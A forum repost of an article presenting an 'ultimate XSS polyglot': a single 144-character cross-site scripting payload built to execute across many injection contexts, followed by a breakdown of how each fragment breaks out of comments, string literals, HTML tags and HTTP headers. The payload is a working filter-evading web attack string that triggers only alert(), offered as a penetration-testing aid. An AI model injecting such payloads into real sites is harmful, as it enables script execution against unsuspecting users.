Nytro Posted March 9, 2016 Report Posted March 9, 2016 Unleashing an Ultimate XSS Polyglot Ahmed Elsobky Foreground: When it comes to testing for cross-site scripting vulnerabilities (a.k.a. XSS), you’re generally faced with a variety of injection contexts where each of which requires you to alter your injection payload so it suites the specific context at hand. This can be too tedious and time consuming in most cases, but luckily, XSS polyglots can come in handy here to save us a lot of time and effort. What is an XSS polyglot? An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form. So, what polyglot you came up with? jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e Anatomy of the polyglot (in a nutshell): jaVasCript:: A label in ECMAScript; a URI scheme otherwise. /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence. (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis! //%0D%0A%0D%0A//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers. </stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence. \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element!! Total length: 144 characters. Link: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot 2 Quote
